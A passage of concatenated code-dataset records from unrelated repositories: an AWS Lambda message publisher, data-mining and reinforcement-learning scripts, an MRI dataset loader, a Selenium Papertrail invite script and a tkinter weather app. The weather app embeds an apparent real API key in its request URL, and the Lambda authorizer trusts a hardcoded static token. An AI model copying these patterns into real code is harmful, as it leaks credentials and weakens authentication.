insert_data.append((payload, rk, False, traceback.format_exc()))\n failed_count += 1\n\n try:\n with db_conn:\n with db_conn.cursor() as cur:\n cur.executemany('insert into events(ts, payload, queue, success, error) '\n 'values (now(), %s, %s, %s, %s)', insert_data)\n except:\n log.exception('Failed to commit publish log to postgresql. Ignored.')\n\n return {\n 'success_count': success_count,\n 'failed_count': failed_count,\n }\n\n\ndef main(event, context):\n amqp_url = os.environ.get('AMQP_URL', None)\n if not amqp_url:\n raise RuntimeError('AMQP_URL must be set')\n\n db_url = os.environ.get('POSTGRESQL_DB_URL', None)\n if not db_url:\n raise RuntimeError('POSTGRESQL_DB_URL must be set')\n\n amqp_channel = provide_amqp(amqp_url)\n db_conn = provide_db(db_url)\n\n request = json.loads(event['body'])\n\n try:\n data = send_messages_handler(amqp_channel, db_conn, request)\n except Exception as escp:\n log.exception('Failed to process request: %s', request)\n\n return {\n 'status_code': 200,\n 'body': json.dumps({\n 'success': False,\n 'error': '{}: {}'.format(str(escp.__class__.__name__), str(escp)),\n 'traceback': traceback.format_exc(),\n })\n }\n\n response = {\n 'success': True,\n }\n if data:\n response['result'] = data\n\n return {\n 'statusCode': 200,\n 'body': json.dumps(response)\n }\n\n\ndef auth(event, context):\n ALLOWED_TOKENS = ['teststatictoken']\n\n auth_token = event.get('authorizationToken', '')\n method_arn = event.get('methodArn', '')\n\n return {\n 'principalId': 'test',\n 'policyDocument': {\n 'Version': '2012-10-17',\n 'Statement': [\n {\n \"Action\": \"execute-api:Invoke\",\n \"Effect\": \"Allow\" if auth_token in ALLOWED_TOKENS else \"Deny\",\n \"Resource\": method_arn\n }\n ]\n },\n # 'context': context,\n }\n\n\nif __name__ == \"__main__\":\n for i in range(2):\n ret = main({\n 'body': json.dumps({\n \"payload\": \"any_string\",\n \"routing_keys\": [\n \"key1\",\n \"key2\"\n ]\n })\n }, '')\n print(json.dumps(ret))\n","repo_name":"styleex/aws-lambda-example","sub_path":"lambda.py","file_name":"lambda.py","file_ext":"py","file_size_in_byte":4368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"72034810247","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# Set work directory\nimport os\nos.getcwd()\nos.chdir(\"C:\\\\Users\\\\Bryan\\\\Desktop\\\\\")\nos.getcwd()\n\n# Import packages\nimport warnings\nwarnings.filterwarnings('ignore')\n\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime\n\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom pymining import itemmining, assocrules\n\nimport ast\n\n\n# In[ ]:\n\n\n#data importing\ndf = pd.read_csv('aaa.csv')\ndf.head(100)\n\n\n# In[20]:\n\n\n#get the model input - freq (a series: index is order number ) \ndf = df.rename(columns = {'日历日(YYYY-MM-DD)':'日期','类别描述':'商品类别'})\ndf['日期'] = pd.to_datetime(df['日期'])\ndf = df[(df['日期']>='2020/08/28')&(df['日期']<='2020-09-29')]\ndf.head()\n\n# groupby combine str\n#freq = df.groupby('零售小票编号')['类别描述'].apply(lambda x: \"[%s]\" % ','.join(x))\nfreq = df.groupby('零售小票编号')['商品类别'].apply(lambda x: ','.join(x))\nfreq = freq.map(lambda x: x.strip(',').split(','))\n\n\n# In[56]:\n\n\nrelim_input = itemmining.get_relim_input(freq)\nreport = itemmining.relim(relim_input, min_support=30)\nreport\n\n\n# In[57]:\n\n\nrules1 = assocrules.mine_assoc_rules(report, min_support=30, min_confidence=0.5)\nrules1\n\n\n# In[58]:\n\n\na = []\nfor line in rules1:\n ## (len(line[0])>1 or len(line[1])>1) could be added for filtering - k-itme set>2 ##\n if ('未知'not in line[0] and '未知'not in line[1]):\n a.append(line)\n\n\n# In[59]:\n\n\nresult = pd.DataFrame(a, columns = ['first_set', 'second_set', 'support','confidence'])\nresult.head()\n\n\n# In[60]:\n\n\nsets = result['second_set']\n\na = [list(x) for x in sets]\n\na\n\n\n# In[61]:\n\n\nsets = [frozenset({'a', 'c,'}), frozenset({'h,', 'a,'})]\n\na = [list(x) for x in sets]\n\na\n\n\n# In[62]:\n\n\nresult.sort_values(by = 'confidence', ascending = False).head(20)\n\n\n# In[63]:\n\n\nresult.sort_values(by = 'support', ascending = False)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Pwnb/association_rule","sub_path":"association_rule.py","file_name":"association_rule.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3585283119","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 25 20:09:39 2019\n\n@author: sakirahas\n\nQ = random\npi = random\n\nwhile True:\n s, a = randomly select from S and A\n states_actions_returns = play_game(start=(s,a))\n for s, a, G in states_actions_returns:\n returns(s, a).append(G)\n Q(s, a) = average(returns(s, a))\n for s in states:\n pi(s) = argmax[a]{Q(s, a)}\n\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom grid_world import standard_grid, negative_grid\nfrom iterative_policy_evaluation import print_values, print_policy\n\nSMALL_ENOUGH = 10e-4\nGAMMA = 0.9\nALL_POSSIBLE_ACTIONS = ('U', 'D', 'L', 'R')\n\n\ndef play_game(grid, policy):\n \n start_states = list(grid.actions.keys())\n start_index = np.random.choice(len(start_states))\n grid.set_state(start_states[start_index])\n \n s = grid.current_state()\n a = np.random.choice(ALL_POSSIBLE_ACTIONS)\n \n \n states_actions_rewards = [(s, a, 0)]\n seen_states = set()\n seen_states.add(grid.current_state())\n num_steps = 0\n \n while True:\n \n #old_s = grid.current_state()\n print(a)\n r = grid.move(a)\n num_steps += 1\n \n s = grid.current_state()\n \n #if old_s == s:\n if s in seen_states:\n reward = -10./num_steps\n states_actions_rewards.append([s, None, -100])\n #states_actions_rewards.append((s, None, reward))\n break\n elif grid.game_over():\n states_actions_rewards.append((s, None, r))\n break\n else:\n a = policy[s]\n states_actions_rewards.append((s, a, r))\n seen_states.add(s)\n # compute the return\n G = 0\n states_actions_returns = []\n \n first = True\n \n for s, a, r in reversed(states_actions_rewards):\n if first:\n first = False\n else:\n states_actions_returns.append((s, a, G))\n \n G = r + GAMMA * G\n states_actions_returns.reverse()\n \n return states_actions_returns\n\n\n\ndef max_dict(d):\n max_key = None\n max_val = float('-inf')\n \n for k, v in d.items():\n if v > max_val:\n max_val = v\n max_key = k\n return max_key, max_val\n\n\n\n \ndef random_actions_states(s, a):\n \n p = np.random.random()\n \n if p < 0.5:\n return (s, a)\n else:\n tmp = list(ALL_POSSIBLE_ACTIONS)\n tmp.remove(a)\n a = np.random.choice(tmp)\n \n return (s, a)\n\nif __name__ == '__main__':\n \n grid = standard_grid()\n grid = negative_grid(step_cost=-0.9)\n \n \n print('rewards')\n print_values(grid.rewards, grid)\n \n \n # initialize a random policy\n \n policy = {}\n \n for s in grid.actions.keys():\n policy[s] = np.random.choice(ALL_POSSIBLE_ACTIONS)\n \n \n \n print('policy')\n print_policy(policy, grid)\n \n Q = {}\n returns = {}\n \n states = grid.all_states()\n actions = grid.actions\n \n for s in states:\n if s in grid.actions:\n Q[s] = {}\n for a in ALL_POSSIBLE_ACTIONS:\n Q[s][a] = 0\n returns[(s, a)] = []\n else:\n pass\n \n # repeat until convergence\n deltas = []\n \n for t in range(2000):\n \n if t%1000 == 0:\n print(t)\n \n biggest_change = 0\n# \n# states_actions_returns = play_game(start=(s,a))\n# for s, a, G in states_actions_returns:\n# returns(s, a).append(G)\n# Q(s, a) = average(returns(s, a))\n# for s in states:\n# pi(s) = argmax[a]{Q(s, a)}\n \n print('At t:', t)\n print(policy)\n \n states_actions_returns = play_game(grid, policy)\n # create a set\n seen_state_action_pairs = set()\n for s, a, G in states_actions_returns:\n \n sa = (s, a)\n if sa not in seen_state_action_pairs:\n old_Q = Q[s][a]\n returns[sa].append(G)\n Q[s][a] = np.mean(returns[sa])\n seen_state_action_pairs.add(sa)\n \n biggest_change = max(biggest_change, np.abs(old_Q - Q[s][a]))\n deltas.append(biggest_change)\n \n for s in policy.keys():\n #policy[s] = np.argmax(Q[s])\n policy[s] = max_dict(Q[s])[0]\n \n \n plt.plot(deltas)\n plt.show()\n \n print('final policy')\n print_policy(policy, grid)\n \n\n\n # find V\n V = {}\n for s, Qs in Q.items():\n V[s] = max_dict(Q[s])[1]\n \n print('final value')\n print_values(V, grid)","repo_name":"sakira/UdemyReinforcementLearning","sub_path":"monte_carlo_control.py","file_name":"monte_carlo_control.py","file_ext":"py","file_size_in_byte":4635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18605624513","text":"import os\nfrom glob import glob\n\nimport SimpleITK as sitk\nimport numpy as np\nimport random\nimport re\nimport shutil\nfrom torchvision.transforms import Compose, CenterCrop, Normalize, ToTensor, Scale, Resize\nfrom .base import BaseDataset\n\n\nmha_save_path = r\"./mha_save_path/\"\nmha_ground_truth = mha_save_path + \"mha_ground_truth/\"\nmha_result = mha_save_path + \"mha_result/\"\n\n\nclass BraTS2015(BaseDataset):\n IN_CHANNELS = 4\n NUM_CLASS = 5\n CROP_SIZE = 256\n CLASS_WEIGHTS = None\n\n def __init__(self, root, split='train', mode='train'):\n basePath = r'/home/soap/code/data/BRATS2015_slice_all'\n self.mode = mode\n self.bra_path = []\n self.OT_path = []\n self.Flair_path = []\n self.T1_path = []\n self.T1c_path = []\n self.T2_path = []\n\n for LorH in os.listdir(basePath + '/Training'):\n path = os.path.join(basePath, 'Training', LorH)\n for filename in os.listdir(path):\n braPath = os.path.join(path, filename)\n self.bra_path.append(braPath)\n\n random.shuffle(self.bra_path)\n num_dataset = len(self.bra_path)\n split = int(num_dataset * 0.8)\n train_path = self.bra_path[0:split]\n val_path = self.bra_path[split:num_dataset]\n test_path = self.bra_path[0:5]\n\n if mode == 'train':\n self.T1_path, self.T1c_path, self.Flair_path, self.T2_path, self.OT_path = self.read_data(train_path)\n elif mode == 'val':\n self.T1_path, self.T1c_path, self.Flair_path, self.T2_path, self.OT_path = self.read_data(val_path)\n elif mode == 'test':\n self.T1_path, self.T1c_path, self.Flair_path, self.T2_path, self.OT_path = self.read_data(test_path)\n\n def __getitem__(self, index):\n\n if self.mode == \"train\":\n ot = self.OT_path[index]\n t1 = self.T1_path[index]\n t2 = self.T2_path[index]\n t1c = self.T1c_path[index]\n flair = self.Flair_path[index]\n elif self.mode == 'val':\n ot = self.OT_path[index]\n t1 = self.T1_path[index]\n t2 = self.T2_path[index]\n t1c = self.T1c_path[index]\n flair = self.Flair_path[index]\n elif self.mode == 'test':\n ot = self.OT_path[index]\n t1 = self.T1_path[index]\n t2 = self.T2_path[index]\n t1c = self.T1c_path[index]\n flair = self.Flair_path[index]\n\n label = self.read_label(ot)\n image_array_t1 = self.read_image(t1)\n image_array_t2 = self.read_image(t2)\n image_array_t1c = self.read_image(t1c)\n image_array_flair = self.read_image(flair)\n image = np.concatenate((image_array_flair, image_array_t1, image_array_t1c, image_array_t2), axis=-1)\n\n image = self.input_transform()(image)\n label = ToTensor()(label)\n\n return image, label\n \n def __len__(self):\n return len(self.OT_path)\n\n @staticmethod\n def input_transform():\n return Compose([\n ToTensor(),\n # flair,t1,t1c,t2\n Normalize(\n mean=[0.2007713, 0.28985304, 0.31852704, 0.36998123],\n std=[0.59269184, 0.9364896, 1.0523965, 1.1754125]\n ),\n # ToTensor()\n ])\n \n @staticmethod\n def read_image(file_name, format=None):\n mha = sitk.ReadImage(file_name)\n image = sitk.GetArrayFromImage(mha)\n image = np.expand_dims(image, -1)\n return image\n\n @staticmethod\n def read_label(file_name, dtype='float'):\n # In some cases, `uint8` is not enough for label\n mha = sitk.ReadImage(file_name)\n image = sitk.GetArrayFromImage(mha)\n # image = np.expand_dims(image, -attention)\n return np.asarray(image, dtype=dtype)\n\n def read_data(self, brapath):\n\n T1_path = []\n T1c_path = []\n Flair_path = []\n T2_path = []\n OT_path = []\n for path in brapath:\n T1_path = T1_path + sorted(glob(path + '/*T1.*/*.gz'), key=lambda name: name[-11:-7])\n T1c_path = T1c_path + sorted(glob(path + '/*T1c.*/*.gz'), key=lambda name: name[-11:-7])\n Flair_path = Flair_path + sorted(glob(path + '/*Flair.*/*.gz'), key=lambda name: name[-11:-7])\n T2_path = T2_path + sorted(glob(path + '/*T2.*/*.gz'), key=lambda name: name[-11:-7])\n OT_path = OT_path + sorted(glob(path + '/*OT.*/*.gz'), key=lambda name: name[-11:-7])\n\n return T1_path, T1c_path, Flair_path, T2_path, OT_path\n\n","repo_name":"qinjinguestc/pnas-nni","sub_path":"refer/BraTS2015.py","file_name":"BraTS2015.py","file_ext":"py","file_size_in_byte":4563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"30687789007","text":"import pytest\n\nfrom adventofcode2023.day11 import Day11PartB\n\n\nclass TestDay11PartB:\n @pytest.mark.parametrize(\n (\"factor\", \"expected_result\"),\n [\n (10, 1030),\n (100, 8410),\n ],\n )\n def test_day11b_testdata(self, testdata, factor, expected_result):\n solution = Day11PartB()\n solution.parse(testdata)\n solution.expand_universe(factor - 1)\n solution.print_solution()\n assert solution.compute_shortest_paths() == expected_result\n\n def test_day11b_data(self):\n \"\"\"Result we got when we did the real solution\"\"\"\n solution = Day11PartB()\n res = solution(\"day_11/day11.txt\")\n assert res == 779032247216\n","repo_name":"RoelAdriaans/adventofcode","sub_path":"tests/adventofcode2023/test_day11_b.py","file_name":"test_day11_b.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4038413711","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nimport platform\nimport os\nimport time\n\nclass PapertrailProvider:\n LOGIN_URL=\"https://my.solarwinds.cloud/login?client_id=papertrail&redirect_uri=https%3A%2F%2Fpapertrailapp.com%2Faccount%2Fauth%2Fswicus%2Fcallback&response_type=code&scope=openid+swicus&state=q96tRqGAiNlq8AlqE0KfDuzT68CF%2FM%2Fu%2Bll%2B4LYy9NM%3D\"\n INVITE_URL=\"https://papertrailapp.com/members/new\"\n\n def __init__(self, email):\n self.email = email\n\n def onboard(self):\n driver = self.setup_driver()\n print(\"\\n- Start onboarding Papertrail\")\n\n try:\n self.sign_in(driver)\n self.invite_user(driver)\n self.check_invitation(driver)\n print(\"- Finish onboarding Papertrail\")\n except Exception as e:\n print(\"- Error \" + str(e))\n finally:\n driver.close()\n\n def sign_in(self, driver):\n driver.get(self.LOGIN_URL)\n print(\"- Sign In Papertrail\")\n \n email_input = driver.find_element_by_name(\"email\")\n email_input.send_keys(os.environ[\"PAPERTRAIL_USERNAME\"].strip())\n print(\"- Filling username\")\n\n password_input = driver.find_element_by_name(\"password\")\n password_input.send_keys(os.environ[\"PAPERTRAIL_PASSWORD\"].strip())\n print(\"- Filling password\")\n\n driver.find_element_by_xpath('//button[text()=\"Log in\"]').click()\n print(\"- Submit login form\")\n \n def invite_user(self, driver):\n self.delay(2)\n\n driver.get(self.INVITE_URL)\n print(\"- Visit invite page\")\n\n self.delay(2)\n \n email_input = driver.find_element_by_id(\"email\")\n email_input.send_keys(self.email)\n print(\"- Invite email \" + self.email)\n\n manage_member_checkbox = driver.find_element_by_name(\"members[][manage_members]\")\n manage_member_checkbox.click()\n print(\"- Untick 'Manage users and permissions' field\")\n\n self.delay(2)\n\n manage_billing_checkbox = driver.find_element_by_name(\"members[][manage_billing]\")\n manage_billing_checkbox.click()\n print(\"- Untick 'Change plans and payment' field\")\n\n receive_usage_emails_checkbox = driver.find_element_by_name(\"members[][receive_usage_emails]\")\n receive_usage_emails_checkbox.click()\n print(\"- Untick 'Usage' field\")\n\n receive_billing_emails_checkbox = driver.find_element_by_name(\"members[][receive_billing_emails]\")\n receive_billing_emails_checkbox.click()\n print(\"- Untick 'Billing' field\")\n\n driver.find_element_by_xpath('//button[contains(text(), \"Invite Member\")]').click()\n print(\"- Submit invite form\")\n\n def check_invitation(self, driver):\n self.delay(2)\n\n driver.find_element_by_xpath(\"//p[contains(text(), '\" + self.email + \" was sent a warm invitation')]\")\n print(\"- Check invitation success\")\n\n def delay(self, second):\n time.sleep(second)\n\n def setup_driver(self):\n # setup headless and chromedriver\n chrome_options = Options()\n chrome_options.add_argument('--headless')\n chrome_options.add_argument('--no-sandbox')\n chrome_options.add_argument('--disable-dev-shm-usage')\n chrome_driver = os.getcwd() + \"/chromedriver\" + self.driver_os()\n\n # setup selenium driver using chrome\n driver = webdriver.Chrome(chrome_driver, chrome_options=chrome_options)\n return driver\n\n def driver_os(self):\n os_type = platform.system()\n if os_type == \"Linux\":\n return \"_linux\"\n elif os_type == \"Darwin\":\n return \"_mac\"\n else:\n return \"\"\n","repo_name":"mekari-engineering/onboard-automation","sub_path":"papertrail_provider.py","file_name":"papertrail_provider.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42709070828","text":"from tkinter import *\r\nimport tkinter as tk\r\nfrom geopy.geocoders import Nominatim\r\nfrom timezonefinder import TimezoneFinder\r\nfrom datetime import *\r\nimport requests\r\nimport pytz\r\nfrom PIL import Image, ImageTk\r\n\r\nroot = Tk()\r\nroot.title('VB Weather Forecasting App')\r\nroot.geometry('890x470+300+200')\r\nroot.configure(bg='#1974D2')\r\nroot.resizable(False,False)\r\n\r\ndef getWeather():\r\n city = textfield.get()\r\n\r\n geolocator = Nominatim(user_agent='geoapiExercises')\r\n location = geolocator.geocode(city)\r\n obj = TimezoneFinder()\r\n\r\n result = obj.timezone_at(lng=location.longitude, lat=location.latitude)\r\n\r\n timezone.config(text=result)\r\n long_lat.config(text=f'{round(location.latitude, 4)}°N, {round(location.longitude, 4)}°E')\r\n\r\n home = pytz.timezone(result)\r\n local_time = datetime.now(home)\r\n current_time = local_time.strftime('%I : %M %p')\r\n clock.config(text=current_time)\r\n\r\n #weather\r\n api = \"https://api.openweathermap.org/data/2.5/weather?lat=\"+str(location.latitude)+\"&lon=\"+str(location.longitude)+\"&units=metric&exclude=hourly&appid=6442700e8816c4110158c787eb10c317\"\r\n\r\n result = requests.get(api)\r\n \r\n if result:\r\n json = result.json()\r\n city = json['name']\r\n country = json['sys']\r\n temp = json['main']['temp']\r\n humidity = json['main']['humidity']\r\n pressure = json['main']['pressure']\r\n wind = json['wind']['speed']\r\n description = json['weather'][0]['main']\r\n final = [city, country, temp, humidity, pressure, wind, description]\r\n print(final)\r\n\r\n t.config(text=(temp, \"°C\"))\r\n h.config(text=(humidity, '%'))\r\n p.config(text=(pressure, 'hPa'))\r\n w.config(text=(wind, 'm/s'))\r\n d.config(text=description)\r\n\r\n #first cell\r\n firstdayimage = json['weather'][0]['icon']\r\n print(firstdayimage)\r\n \r\n img = (Image.open(f'icon/{firstdayimage}@2x.png'))\r\n photo1 = ImageTk.PhotoImage(img)\r\n firstimage.config(image=photo1)\r\n firstimage.image = photo1\r\n\r\n tempdaymin1 = json['main']['temp_min']\r\n tempdaymax1 = json['main']['temp_max']\r\n\r\n day1temp.config(text=f'Min: {tempdaymin1}\\n Max: {tempdaymax1}')\r\n\r\n #second cell\r\n seconddayimage = json['weather'][0]['icon']\r\n print(seconddayimage)\r\n\r\n img = (Image.open(f'icon/{seconddayimage}@2x.png'))\r\n resized_image = img.resize((40,40))\r\n photo2 = ImageTk.PhotoImage(resized_image)\r\n secondimage.config(image=photo2)\r\n secondimage.image = photo2\r\n\r\n tempdaymin2 = json['main']['temp_min']\r\n tempdaymax2 = json['main']['temp_max']\r\n\r\n day2temp.config(text=f'Min: {tempdaymin2}\\n Max: {tempdaymax2}')\r\n\r\n #third cell\r\n thirddayimage = json['weather'][0]['icon']\r\n print(thirddayimage)\r\n\r\n img = (Image.open(f'icon/{thirddayimage}@2x.png'))\r\n resized_image = img.resize((40,40))\r\n photo3 = ImageTk.PhotoImage(resized_image)\r\n thirdimage.config(image=photo3)\r\n thirdimage.image = photo3\r\n\r\n tempdaymin3 = json['main']['temp_min']\r\n tempdaymax3 = json['main']['temp_max']\r\n\r\n day3temp.config(text=f'Min: {tempdaymin3}\\n Max: {tempdaymax3}')\r\n\r\n #fourth cell\r\n fourthdayimage = json['weather'][0]['icon']\r\n print(fourthdayimage)\r\n\r\n img = (Image.open(f'icon/{fourthdayimage}@2x.png'))\r\n resized_image = img.resize((40,40))\r\n photo4 = ImageTk.PhotoImage(resized_image)\r\n fourthimage.config(image=photo4)\r\n fourthimage.image = photo4\r\n\r\n tempdaymin4 = json['main']['temp_min']\r\n tempdaymax4 = json['main']['temp_max']\r\n\r\n day4temp.config(text=f'Min: {tempdaymin4}\\n Max: {tempdaymax4}')\r\n\r\n #fifth cell\r\n fifthdayimage = json['weather'][0]['icon']\r\n print(fifthdayimage)\r\n\r\n img = (Image.open(f'icon/{fifthdayimage}@2x.png'))\r\n resized_image = img.resize((40,40))\r\n photo5 = ImageTk.PhotoImage(resized_image)\r\n fifthimage.config(image=photo5)\r\n fifthimage.image = photo5\r\n\r\n tempdaymin5 = json['main']['temp_min']\r\n tempdaymax5 = json['main']['temp_max']\r\n\r\n day5temp.config(text=f'Min: {tempdaymin5}\\n Max: {tempdaymax5}')\r\n\r\n #sixth cell\r\n sixthdayimage = json['weather'][0]['icon']\r\n print(sixthdayimage)\r\n\r\n img = (Image.open(f'icon/{sixthdayimage}@2x.png'))\r\n resized_image = img.resize((40,40))\r\n photo6 = ImageTk.PhotoImage(resized_image)\r\n sixthimage.config(image=photo6)\r\n sixthimage.image = photo6\r\n\r\n tempdaymin6 = json['main']['temp_min']\r\n tempdaymax6 = json['main']['temp_max']\r\n\r\n day6temp.config(text=f'Min: {tempdaymin6}\\n Max: {tempdaymax6}')\r\n\r\n #seventh cell\r\n seventhdayimage = json['weather'][0]['icon']\r\n print(seventhdayimage)\r\n\r\n img = (Image.open(f'icon/{seventhdayimage}@2x.png'))\r\n resized_image = img.resize((40,40))\r\n photo7 = ImageTk.PhotoImage(resized_image)\r\n seventhimage.config(image=photo7)\r\n seventhimage.image = photo7\r\n\r\n tempdaymin7 = json['main']['temp_min']\r\n tempdaymax7 = json['main']['temp_max']\r\n\r\n day7temp.config(text=f'Min: {tempdaymin7}\\n Max: {tempdaymax7}')\r\n\r\n #days\r\n first = datetime.now()\r\n day1.config(text=first.strftime('%A'))\r\n\r\n second = first+timedelta(days=1)\r\n day2.config(text=second.strftime('%A'))\r\n\r\n third = first+timedelta(days=2)\r\n day3.config(text=third.strftime('%A'))\r\n\r\n fourth = first+timedelta(days=3)\r\n day4.config(text=fourth.strftime('%A'))\r\n\r\n fifth = first+timedelta(days=4)\r\n day5.config(text=fifth.strftime('%A'))\r\n\r\n sixth = first+timedelta(days=5)\r\n day6.config(text=sixth.strftime('%A'))\r\n\r\n seventh = first+timedelta(days=6)\r\n day7.config(text=seventh.strftime('%A'))\r\n\r\n\r\n else:\r\n print(\"NO Content Found\")\r\n\r\n\r\n\r\n##icon\r\nimage_icon = PhotoImage(file='images/logo.png')\r\nroot.iconphoto(False, image_icon)\r\n\r\nRound_box = PhotoImage(file='images/Rounded Rectangle 1.png')\r\nLabel(root, image=Round_box, bg='#1974D2', height=120, width=180 ).place(x=50, y=110)\r\n\r\n#label\r\nlabel1 = Label(root, text='Temperature:', font=('Helvetica', 11), fg='white', bg='#203243')\r\nlabel1.place(x=60, y=120)\r\n\r\nlabel2 = Label(root, text='Humidity:', font=('Helvetica', 11), fg='white', bg='#203243')\r\nlabel2.place(x=60, y=140)\r\n\r\nlabel3 = Label(root, text='Pressure:', font=('Helvetica', 11), fg='white', bg='#203243')\r\nlabel3.place(x=60, y=160)\r\n\r\nlabel4 = Label(root, text='Wind Speed:', font=('Helvetica', 11), fg='white', bg='#203243')\r\nlabel4.place(x=60, y=180)\r\n\r\nlabel5 = Label(root, text='Description:', font=('Helvetica', 11), fg='white', bg='#203243')\r\nlabel5.place(x=60, y=200)\r\n\r\n##search box\r\nSearch_image = PhotoImage(file='images/Rounded Rectangle 3.png')\r\nmyimage = Label(image=Search_image, bg='#1974D2')\r\nmyimage.place(x=290, y=120)\r\n\r\nweat_image = PhotoImage(file='images/Layer 7.png')\r\nweather_image = Label(root, image=weat_image, bg='#203243')\r\nweather_image.place(x=310, y=127)\r\n\r\ntextfield = tk.Entry(root, justify='center', width=18, font=('poppins', 25, 'bold'), bg='#203243', border=0, fg='white')\r\ntextfield.place(x=380, y=130)\r\ntextfield.focus()\r\n\r\nSearch_icon = PhotoImage(file='images/Layer 6.png')\r\nmy_image_icon = Button(image=Search_icon, borderwidth=0, cursor='hand2', bg='#203243', command=getWeather)\r\nmy_image_icon.place(x=655, y=125)\r\n\r\n##Bottom Box\r\nframe = Frame(root, width=900, height=180, bg='#000000')\r\nframe.pack(side=BOTTOM)\r\n\r\n#bottom boxes\r\nfirstbox = PhotoImage(file='images/Rounded Rectangle 2.png')\r\nsecondbox = PhotoImage(file='images/Rounded Rectangle 2 copy.png')\r\n\r\nLabel(frame, image=firstbox, bg='#000000').place(x=30, y=20)\r\nLabel(frame, image=secondbox, bg='#000000').place(x=300, y=30)\r\nLabel(frame, image=secondbox, bg='#000000').place(x=400, y=30)\r\nLabel(frame, image=secondbox, bg='#000000').place(x=500, y=30)\r\nLabel(frame, image=secondbox, bg='#000000').place(x=600, y=30)\r\nLabel(frame, image=secondbox, bg='#000000').place(x=700, y=30)\r\nLabel(frame, image=secondbox, bg='#000000').place(x=800, y=30)\r\n\r\n#clock(time)\r\nclock = Label(root, font=('Helvetica', 30, 'bold'), fg='white', bg='#1974D2')\r\nclock.place(x=30, y=20)\r\n\r\n#timezone\r\ntimezone = Label(root, font=('Helvetica', 20), fg='white', bg='#1974D2')\r\ntimezone.place(x=700, y=20)\r\n\r\nlong_lat = Label(root, font=('Helvetica', 10), fg='white', bg='#1974D2')\r\nlong_lat.place(x=700, y=50)\r\n\r\n#thpwd\r\nt = Label(root, font=('Helvetica', 11), fg='white', bg='#203243')\r\nt.place(x=150, y=120)\r\nh = Label(root, font=('Helvetica', 11), fg='white', bg='#203243')\r\nh.place(x=150, y=140)\r\np = Label(root, font=('Helvetica', 11), fg='white', bg='#203243')\r\np.place(x=150, y=160)\r\nw = Label(root, font=('Helvetica', 11), fg='white', bg='#203243')\r\nw.place(x=150, y=180)\r\nd = Label(root, font=('Helvetica', 11), fg='white', bg='#203243')\r\nd.place(x=150, y=200)\r\n\r\n#first cell\r\nfirstframe = Frame(root, width=230, height=132, bg='#38ACEC')\r\nfirstframe.place(x=35, y=315)\r\n\r\nday1 = Label(firstframe, font='arial 20', bg='#38ACEC', fg='#000000')\r\nday1.place(x=100, y=5)\r\n\r\nfirstimage = Label(firstframe, bg='#38ACEC')\r\nfirstimage.place(x=1, y=15)\r\n\r\nday1temp = Label(firstframe, bg='#38ACEC', fg='#FFFF00', font='arial 15 bold')\r\nday1temp.place(x=100, y=50)\r\n\r\n#second cell\r\nsecondframe = Frame(root, width=70, height=115, bg='#38ACEC')\r\nsecondframe.place(x=305, y=325)\r\n\r\nday2 = Label(secondframe, bg='#38ACEC', fg='#000000')\r\nday2.place(x=10, y=5)\r\n\r\nsecondimage = Label(secondframe, bg='#38ACEC')\r\nsecondimage.place(x=7, y=20)\r\n\r\nday2temp = Label(secondframe, bg='#38ACEC', fg='#00008B', font='arial 10 bold')\r\nday2temp.place(x=-5, y=60)\r\n\r\n#third cell\r\nthirdframe = Frame(root, width=70, height=115, bg='#38ACEC')\r\nthirdframe.place(x=405, y=325)\r\n\r\nday3 = Label(thirdframe, bg='#38ACEC', fg='#000000')\r\nday3.place(x=10, y=5)\r\n\r\nthirdimage = Label(thirdframe, bg='#38ACEC')\r\nthirdimage.place(x=7, y=20)\r\n\r\nday3temp = Label(thirdframe, bg='#38ACEC', fg='#00008B', font='arial 10 bold')\r\nday3temp.place(x=-5, y=60)\r\n\r\n#fourth cell\r\nfourthframe = Frame(root, width=70, height=115, bg='#38ACEC')\r\nfourthframe.place(x=505, y=325)\r\n\r\nday4 = Label(fourthframe, bg='#38ACEC', fg='#000000')\r\nday4.place(x=10, y=5)\r\n\r\nfourthimage = Label(fourthframe, bg='#38ACEC')\r\nfourthimage.place(x=7, y=20)\r\n\r\nday4temp = Label(fourthframe, bg='#38ACEC', fg='#00008B', font='arial 10 bold')\r\nday4temp.place(x=-5, y=60)\r\n\r\n#fifth cell\r\nfifthframe = Frame(root, width=70, height=115, bg='#38ACEC')\r\nfifthframe.place(x=605, y=325)\r\n\r\nday5 = Label(fifthframe, bg='#38ACEC', fg='#000000')\r\nday5.place(x=10, y=5)\r\n\r\nfifthimage = Label(fifthframe, bg='#38ACEC')\r\nfifthimage.place(x=7, y=20)\r\n\r\nday5temp = Label(fifthframe, bg='#38ACEC', fg='#00008B', font='arial 10 bold')\r\nday5temp.place(x=-5, y=60)\r\n\r\n#sixth cell\r\nsixthframe = Frame(root, width=70, height=115, bg='#38ACEC')\r\nsixthframe.place(x=705, y=325)\r\n\r\nday6 = Label(sixthframe, bg='#38ACEC', fg='#000000')\r\nday6.place(x=10, y=5)\r\n\r\nsixthimage = Label(sixthframe, bg='#38ACEC')\r\nsixthimage.place(x=7, y=20)\r\n\r\nday6temp = Label(sixthframe, bg='#38ACEC', fg='#00008B', font='arial 10 bold')\r\nday6temp.place(x=-5, y=60)\r\n\r\n#seventh cell\r\nseventhframe = Frame(root, width=70, height=115, bg='#38ACEC')\r\nseventhframe.place(x=805, y=325)\r\n\r\nday7 = Label(seventhframe, bg='#38ACEC', 